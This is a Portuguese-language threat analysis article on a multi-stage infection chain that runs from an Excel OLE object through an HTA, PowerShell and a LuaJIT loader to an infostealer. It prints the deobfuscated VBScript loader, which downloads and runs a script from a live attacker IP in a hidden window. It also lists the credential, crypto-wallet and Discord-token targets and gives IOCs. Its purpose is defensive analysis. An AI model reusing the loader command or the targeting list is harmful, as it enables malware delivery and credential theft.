Análise Detalhada da Cadeia de Infecção via Documento Excel: de Objeto OLE a LuaJIT InfoStealer

Análise Detalhada da Cadeia de Infecção via Documento Excel: de Objeto OLE a LuaJIT InfoStealer

Investigamos uma sofisticada cadeia de infecção que se inicia com um documento Excel e culmina na execução de um infostealer baseado em LuaJIT. A análise revela o uso de objetos OLE, redirecionamentos HTTP e arquivos com extensões incomuns para mascarar o payload malicioso.

MundiX News·10 de julho de 2026·7 min de leitura·👁 1 views

A maioria das campanhas de malware modernas abandonou há muito tempo o uso de macros clássicas do Microsoft Office. Em vez disso, os atacantes constroem cadeias de infecção em várias etapas, onde cada componente executa apenas uma pequena tarefa: o documento inicial apenas inicia o download da próxima fase, que por sua vez baixa um novo componente, que por sua vez executa o módulo malicioso principal.

Durante a análise de uma dessas amostras, a cadeia de infecção completa foi investigada – desde um e-mail com um anexo Excel até a execução de um loader LuaJIT e um subsequente infostealer. Uma característica interessante da campanha é o uso de arquivos com extensões não padronizadas (.PIF e .TTF), que na verdade não são nem atalhos nem fontes. Abaixo, examinaremos cada etapa do funcionamento da cadeia maliciosa.

E-mail Inicial

Um e-mail com o anexo "Número do pedido 6482.xls" é recebido. Ao abrir o documento, o usuário não observa nenhuma atividade suspeita. O documento está praticamente vazio e não contém conteúdo visível. No entanto, se o arquivo for aberto como Compound File Storage (OLE Structured Storage), a seguinte estrutura pode ser observada:

MBD000203B4 └── [1]Ole

Para documentos no formato XLS, a presença de fluxos OLE é um fenômeno absolutamente normal. No entanto, o conteúdo do fluxo [1]Ole merece atenção. Dentro dele, encontra-se a seguinte string:

http://030073154515/.windowslatest.com20260614windows-11-kb5094126-issues-include-boot-failures-bsod-bitlocker-recovery-on-some-pcs-hp-onedrive-sync-and-enterprise-apps.php

À primeira vista, o URL se assemelha a uma publicação de notícias sobre o Windows Update no site WindowsLatest. Na verdade, é apenas uma tentativa de disfarçar a infraestrutura maliciosa como um recurso legítimo.

Cadeia de Rede

Após a abertura do documento, inicia-se uma sequência de requisições HTTP. A primeira requisição é feita para o endereço:

http://192.236.217.77/.windowslatest.com20260614windows-11-kb5094126-issues-include-boot-failures-bsod-bitlocker-recovery-on-some-pcs-hp-onedrive-sync-and-enterprise-apps.php

O servidor responde com:

HTTP/1.1 301 Moved Permanently

Em seguida, ocorre um redirecionamento para um link encurtado:

https://masuk.to/fypLcP

A próxima resposta é:

HTTP/1.1 302 Found

E o navegador é redirecionado para o endereço final:

http://192.236.217.77/33/ev/fdd.hta

É aqui que a fase real de infecção começa. Esquematicamente, a cadeia se parece com isto:

Excel │ ▼ OLE Stream │ ▼ HTTP Request │ ▼ 301 Redirect │ ▼ Shortener │ ▼ 302 Redirect │ ▼ fdd.hta

O uso de múltiplos redirecionamentos HTTP permite que os atacantes:

  • Dificultem a análise;
  • Troquem rapidamente o servidor final;
  • Escondam a infraestrutura real;
  • Contornem filtros de URL simples.

Análise do Arquivo HTA

Após passar pela cadeia de redirecionamentos, o arquivo fdd.hta é baixado. HTA (HTML Application) é um documento HTML comum que é executado pelo motor do Internet Explorer com direitos quase completos do usuário. O código principal consiste em VBScript fortemente ofuscado. Após a desofuscação, o seguinte código é obtido:

Option Explicit

Dim sh Dim cmd

Set sh = CreateObject("WScript.Shell")

cmd = "%COMSPEC% /C " & _ "powershell.exe " & _ "-ExecutionPolicy Bypass " & _ "-NoProfile " & _ "-WindowStyle Hidden " & _ "-Command " & _ ""wget http://192.236.217.77/33/goodpeoplesgivingbestserviceforbest.js " & _ "-OutFile $env:AppData\goodpeoplesgivingbestserviceforbest.js; " & _ "& $env:AppData\goodpeoplesgivingbestserviceforbest.js""

sh.Run cmd, 0, False

Set sh = Nothing

Apesar do pequeno volume de código, este script funciona como um loader completo. A sequência de sua operação é a seguinte:

  1. Cria-se um objeto WScript.Shell.
  2. Através de %COMSPEC%, inicia-se cmd.exe.
  3. De cmd.exe, inicia-se o PowerShell.
  4. O PowerShell é iniciado em modo oculto.
  5. A política de execução de scripts é desativada (ExecutionPolicy Bypass).
  6. O perfil do usuário não é carregado (NoProfile).
  7. A janela do PowerShell é ocultada (WindowStyle Hidden).
  8. O download da próxima etapa é executado.
  9. O JavaScript baixado é executado imediatamente.

Na verdade, este arquivo HTA não contém a carga maliciosa em si. Sua única tarefa é baixar o próximo componente.

JavaScript Loader

A próxima etapa é a execução do arquivo goodpeoplesgivingbestserviceforbest.js. Apesar do nome longo, a funcionalidade é bastante simples. O script baixa dois arquivos:

JJGIMJPBTQUZEYUL.PIF JJGIMJPBTQUZEYUL.ttf

À primeira vista, pode parecer que:

  • PIF é um atalho antigo do Windows;
  • TTF é uma fonte comum.

No entanto, ambos os arquivos são usados de forma completamente diferente. O arquivo JJGIMJPBTQUZEYUL.PIF é, na verdade, um executável LuaJIT Loader. O segundo arquivo, JJGIMJPBTQUZEYUL.ttf, não é uma fonte. É um script Lua comum.

A execução ocorre da seguinte forma:

"C:\Users<user>\Documents\JJGIMJPBTQUZEYUL.PIF" C:\Users<user>\Documents\JJGIMJPBTQUZEYUL.ttf

Assim:

PIF ↓ LuaJIT Runtime ↓ TTF ↓ Lua Script

A extensão .ttf é usada exclusivamente para mascaramento. O próprio LuaJIT Loader recebe o caminho do arquivo e o interpreta como código Lua. Essa abordagem oferece várias vantagens:

  • Contorno de assinaturas simples;
  • Ocultação do verdadeiro propósito do arquivo;
  • Complicação da análise estática;
  • Redução do número de detecções por antivírus.

Comportamento do Script Lua

Após a execução, inicia-se a coleta ativa de informações do sistema. Primeiro, várias chaves de registro são lidas. Obtêm-se:

  • MachineGuid;
  • ComputerName;
  • InstallationType;
  • Versão das tabelas de ordenação NLS.

Isso permite a formação de um identificador único do sistema infectado.

Desativação de Logging

Em seguida, o programa malicioso altera as configurações de rastreamento do Windows. O valor é modificado:

HKLM\SOFTWARE\Microsoft\Tracing
JJGIMJPBTQUZEYUL_RASAPI32

Parâmetro:

EnableFileTracing = 0

Dessa forma, o rastreamento de arquivos do RAS API é desativado. Essa técnica corresponde ao MITRE ATT&CK: T1562.002 Impair Defenses.

Verificação de Configurações do Internet Explorer

A próxima etapa é a leitura das configurações de segurança do Internet Explorer. Em particular, os parâmetros DisableSecuritySettingsCheck e RunBinaryControlHostProcessInSeparateAppContainer são analisados. Mesmo que o Internet Explorer seja considerado obsoleto há muito tempo, seus componentes ainda são usados por muitos mecanismos do sistema Windows.

Execução de Navegadores

Uma característica interessante é a execução do Chrome e do Microsoft Edge com parâmetros incomuns. Por exemplo:

--no-sandbox

--disable-gpu

--disable-audio

--mute-audio

--user-data-dir=

Um perfil de usuário completamente separado é criado. Isso permite evitar conflitos com o navegador já em execução e realizar operações independentemente da sessão principal do usuário.

Busca por Informações Confidenciais

A parte mais interessante começa a seguir. O script Lua começa a verificar a existência de vários arquivos e diretórios.

  • Clientes de E-mail: São verificados Thunderbird, Mailbird, Microsoft Outlook. No Outlook, acessam-se as chaves de perfil: POP3 Password.
  • Navegadores: São verificados Google Chrome, Microsoft Edge, Opera, Opera GX. São estudados Cookies, Local State, perfis de usuários, configurações de navegadores.
  • Gerenciadores de Senhas: São feitas requisições às extensões de gerenciadores de senhas populares. Por exemplo: aeblfdkhhhdcdjpifhhbdiojplfjncoa.
  • Carteiras de Criptomoedas: São verificados os diretórios de extensões: kkpllkodjeloidieedojogacfhpaihoh, fcfcfllfndlomdhbehjjcoimbgofdncg, lgmpcpglpngdoalbgeoldeajfclnhafa, jnlgamecbpmbajjfhmmmlhejkemejdma, mcohilncbfahbmgdjkbpemcciiolgcge. Cada identificador corresponde a uma extensão de navegador de carteira de criptomoedas específica.
  • Discord: Também é realizada a busca por Discord, em particular, Local Storage, onde tokens de autorização podem ser armazenados.

Esquema Geral de Infecção

A cadeia completa se parece com isto:

Email │ ▼ Excel (.xls) │ ▼ OLE Object │ ▼ HTTP Request │ ▼ 301 Redirect │ ▼ 302 Redirect │ ▼ HTA │ ▼ VBScript │ ▼ PowerShell │ ▼ JavaScript │ ▼ LuaJIT Loader (.PIF) │ ▼ Lua Script (.TTF) │ ▼ System Reconnaissance

Credential Access

Browser Data Collection

Crypto Wallet Discovery │ ▼ 38.49.217.157

Cada etapa executa apenas uma função, graças ao qual toda a cadeia se torna significativamente menos perceptível para os meios de proteção. E todos os dados obtidos são enviados para o IP como 38.49.217.157.

Indicadores de Comprometimento (IOC)

  • Arquivos SHA256:

    • Número do pedido 6482.xls: a95dedfe8471179b42d61538954be3d42aec68321181ac9bc74fefc30160991d
    • fdd.hta: 540a0c9d12b13a3b084fac354c6c3bf7bfaea52bdf7c00ef69f9bb1881060498
    • JJGIMJPBTQUZEYUL.PIF: 52f0c0230b580e2fdf53a378b5c6d0db9829af900dae43e0df8f18635cd9f0c1
    • JJGIMJPBTQUZEYUL.ttf: c33c556661cb27e1277702cbba93dfd466742690edca38ea55bf5532387068a6
  • Arquivos:

    • Número do pedido 6482.xls
    • fdd.hta
    • goodpeoplesgivingbestserviceforbest.js
    • JJGIMJPBTQUZEYUL.PIF
    • JJGIMJPBTQUZEYUL.ttf
  • Indicadores de Rede:

    • 192.236.217.77
    • masuk.to
    • 38.49.217.157
  • Comandos Chave:

    • powershell.exe
    • -ExecutionPolicy Bypass
    • -NoProfile
    • -WindowStyle Hidden

É importante notar que, no momento da análise, o servidor http://192.236.217.77/33 ainda estava acessível, e os arquivos utilizados nesta cadeia de infecção continuavam nele. Ou seja, a infraestrutura de ataque não foi desativada e ainda poderia ser usada para disseminação posterior.

Portanto, seja cauteloso ao lidar com e-mails e anexos, especialmente com documentos .xls de remetentes desconhecidos. À primeira vista, tal arquivo pode parecer um documento comum, mas uma cadeia inteira de download de malware pode estar escondida dentro dele.

Conclusão

A cadeia analisada demonstra a abordagem moderna para a disseminação de malware. Em vez de um único arquivo executável, os atacantes utilizam várias etapas, onde cada componente executa sua tarefa: o documento Microsoft Excel Workbook (.xls) inicia a cadeia inicial, o HTML Application (.hta) baixa a próxima etapa, o PowerShell obtém o script JavaScript (.js), e o LuaJIT Loader executa o código Lua principal, escondido sob a extensão TrueType Font (.ttf).

O uso de extensões não padronizadas .pif e .ttf, bem como múltiplos linguagens de script, complica a análise e ajuda a contornar meios de detecção simples. O módulo Lua final realiza a coleta de informações do sistema, verifica a presença de dados de navegadores, clientes de e-mail, gerenciadores de senhas, extensões de criptomoedas e outras fontes de informações confidenciais. Esse comportamento é característico de infostealers modernos, cujo principal objetivo é roubar credenciais e dados do usuário.

Como resultado, temos um ataque em várias etapas, onde cada arquivo individual parece menos suspeito, mas juntos formam uma cadeia de infecção completa.

🛡️⚡

Pare de pesquisar. Comece a hackear.

O MundiX é seu copiloto de pentest com IA: comandos exatos, análise de outputs e próximo passo na kill chain — em segundos.

Testar grátis por 7 dias →

Sem cartão para começar · Planos a partir de R$49/mês

📤 Compartilhar & Baixar

🧰 Ferramentas recomendadas

Divulgação: alguns links são patrocinados. Podemos receber comissão se você comprar — sem custo extra para você. Só indicamos o que faz sentido para a comunidade.

Aprendendo Kali Linux: Teste de segurança, pentest e hacking ético

Aprendendo Kali Linux: Teste de segurança, pentest e hacking ético

Com centenas de ferramentas pré-instaladas, a distribuição Kali Linux facilita o trabalho de os profissionais de segurança começarem a fazer testes de segurança rapidamente. No entanto, com mais de 600 ferramentas em seu arsenal, o Kali Linux também pode ser desafiador. A nova edição deste prático livro abrange as atualizações nas ferramentas e inclui uma melhor abordagem da análise forense e da engenharia reversa. Ric Messier, autor, não fica apenas no teste de segurança, mas também faz uma abordagem sobre a execução de análise forense, incluindo a análise em disco e na memória, assim como alguma análise básica de malware. • Explore as diversas ferramentas disponíveis no Kali Linux • Entenda o valor do teste de segurança e examine os tipos de teste disponíveis • Aprenda os aspectos básicos do pentest em todo o ciclo de vida do ataque • Instale o Kali Linux em vários sistemas, tanto físicos quanto virtuais • Descubra como usar diferentes ferramentas destinadas à segurança • Estruture um teste de segurança baseado nas ferramentas do Kali Linux • Estenda as ferramentas do Kali para criar técnicas de ataque avançadas • Use o Kali Linux para ajudar a criar relatórios quando o teste terminar “A abordagem concisa, clara e baseada na experiência adotada por Ric Messier para a introdução do Kali Linux e dos testes de cibersegurança é incomparável. Este livro é uma leitura excelente e acessível para iniciantes e um recurso valioso para qualquer pessoa.” —Alexander Arlt, Consultor sênior de segurança, Google

Ver na Amazon
Gshield 2 em 1 Hub Extensor Conector USB-C + USB-A e Adaptador de Rede Ethernet LAN RJ45 com 3 Entradas USB 3.0 até 5 Gbps em Liga de Alumínio para Computador e Notebook, Cinza

Gshield 2 em 1 Hub Extensor Conector USB-C + USB-A e Adaptador de Rede Ethernet LAN RJ45 com 3 Entradas USB 3.0 até 5 Gbps em Liga de Alumínio para Computador e Notebook, Cinza

Compatível com portas USB-C e USB-A, ideal para ampliar a conectividade de dispositivos como MacBook Pro e outros com portas USB-C. Inclui um adaptador USB-A extra, proporcionando uma conexão Ethernet estável e veloz de até 1 Gbps, perfeita para filmes, jogos online e videoconferências. Oferece três portas USB 3.0 com velocidades de transferência de até 5 Gbps, permitindo conectar mouse, teclado, discos rígidos e outros periféricos. Fabricado em alumínio durável, garantindo longa vida útil e resistência ao uso diário. Design compacto e leve, ideal para viagens de negócios e uso diário, facilitando o transporte e armazenamento. Funciona com Windows 10/8.1/8, Mac OS e Chrome OS, oferecendo versatilidade incomparável para diversas necessidades de conectividade. Assegura uma conectividade estável e rápida, perfeita para tarefas exigentes como transferência de dados, streaming e mais.

Ver na Amazon
Hacking APIs: Breaking Web Application Programming Interfaces

Hacking APIs: Breaking Web Application Programming Interfaces

Hacking APIs is a crash course on web API security testing that will prepare you to penetration-test APIs, reap high rewards on bug bounty programs, and make your own APIs more secure. You'll learn how REST and GraphQL APIs work in the wild and set up a streamlined API testing lab with Burp Suite and Postman. Then you'll master tools useful for reconnaissance, endpoint analysis, and fuzzing, such as Kiterunner and OWASP Amass. Next, you'll learn to perform common attacks, like those targeting an API's authentication mechanisms and the injection vulnerabilities commonly found in web applications. You'll also learn techniques for bypassing protections against these attacks. In the book's nine guided labs, which target intentionally vulnerable APIs, you'll practice: Enumerating APIs users and endpoints using fuzzing techniques Using Postman to discover an excessive data exposure vulnerability Performing a JSON Web Token attack against an API authentication process Combining multiple API attack techniques to perform a NoSQL injection Attacking a GraphQL API to uncover a broken object level authorization vulnerability

Ver oferta
Gray Hat Hacking: The Ethical Hacker's Handbook, Sixth Edition

Gray Hat Hacking: The Ethical Hacker's Handbook, Sixth Edition

Up-to-date strategies for thwarting the latest, most insidious network attacks This fully updated, industry-standard security resource shows, step by step, how to fortify computer networks by learning and applying effective ethical hacking techniques. Based on curricula developed by the authors at major security conferences and colleges, the book features actionable planning and analysis methods as well as practical steps for identifying and combating both targeted and opportunistic attacks. Gray Hat Hacking: The Ethical Hacker's Handbook, Sixth Edition clearly explains the enemy's devious weapons, skills, and tactics and offers field-tested remedies, case studies, and testing labs. You will get complete coverage of Internet of Things, mobile, and Cloud security along with penetration testing, malware analysis, and reverse engineering techniques. State-of-the-art malware, ransomware, and system exploits are thoroughly explained. Fully revised content includes 7 new chapters covering the latest threats Includes proof-of-concept code stored on the GitHub repository Authors train attendees at major security conferences, including RSA, Black Hat, Defcon, and B-Sides

Ver na Amazon
Bloqueador USB de privacidade de porta USB para PC, notebook, bloco de laptop,

Bloqueador USB de privacidade de porta USB para PC, notebook, bloco de laptop,

Proteção de privacidade aprimorada: protege o link de transmissão de dados para evitar roubo de informações, fornecendo proteção de segurança robusta que protege a privacidade do usuário durante transferências de arquivos e garante uma conexão segura para interações de dispositivos sem preocupações em vários ambientes Uso a longo prazo: a camada protetora resistente ao desgaste, combinada com um corpo de metal resistente, oferece gerenciamento de calor confiável e qualidade duradoura durante o uso diário Entrega eficiente de energia: a tecnologia de chip inteligente garante a identificação automática dos requisitos de energia, fornecendo carregamento eficiente alinhando-se com vários protocolos de carregamento rápido para maior conveniência Proteção contra sobrecarga: evitando riscos de sobrecarga, este bloqueador de dados USB protege a vida útil da bateria e garante um desempenho estável, mantendo um fluxo estável de energia para melhorar a longevidade do dispositivo de forma eficaz Prático de transportar: com atenção à portabilidade, este bloqueador de dados USB oferece um design compacto que é leve e fácil de transportar, melhorando a conveniência do usuário e operação eficiente

Ver na Amazon

📩 Newsletter MundiX

Receba novidades de cibersegurança + um checklist de pentest grátis. Sem spam.

Ao assinar você concorda em receber e-mails. Cancele quando quiser.